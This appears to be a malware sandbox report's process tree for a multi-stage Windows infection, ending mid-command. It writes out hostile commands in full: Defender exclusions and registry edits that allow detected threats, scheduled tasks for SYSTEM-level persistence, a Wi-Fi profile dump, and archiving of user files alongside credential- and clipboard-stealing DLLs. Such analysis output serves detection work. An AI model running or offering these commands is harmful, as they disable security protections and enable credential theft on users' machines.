C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2400
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3840 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:3396 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3984 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\341999741358_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵PID:4248
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe"C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe"4⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe"C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe"4⤵
- Executes dropped EXE
PID:3916 -
C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe"C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe"4⤵
- Executes dropped EXE
PID:5032 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:2088 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exeC:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f51e1d0,0x6f51e1dc,0x6f51e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2088 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429115429" --session-guid=77eaa7be-3765-456f-a6fc-0cc9a32a7783 --server-tracking-blob="NTIwYjNjOTU0ZDg2NjNmZjgxNzNiYjQxN2Y5NTBiZTIwNDhkNmEwM2VmMWQ2M2VlNGEyMjA3MGFlZTA1Yzg5Zjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzkxNjY0LjYzMjIiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYzcyOGNjMmQtZGU3ZC00MzYxLTk3ZTEtOThiNzJmMjRhYzIyIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2C040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2916 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exeC:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6eb9e1d0,0x6eb9e1dc,0x6eb9e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xfe6038,0xfe6044,0xfe60506⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe"C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe"4⤵
- Executes dropped EXE
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1728
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵PID:2344
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:3944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:2172
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵PID:3480
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:3580
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:3952
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵PID:1764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:3120
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:4196
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵PID:880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:960
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:2320
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:1432
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵PID:3984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵PID:4688
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:72
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 11:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe\" Wt /LmNdidrjZR 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2120 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵PID:1076
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵PID:2708
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵PID:4872
-
C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe"C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe"4⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2316 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:2060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3496 -ip 34961⤵PID:5112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3068 -ip 30681⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2132 -ip 21321⤵PID:4816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe Wt /LmNdidrjZR 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3372
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3160
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:920
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3480
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4768
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:560
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4448
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:2844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:1996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2720
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2536
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1196
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4404
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:4088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 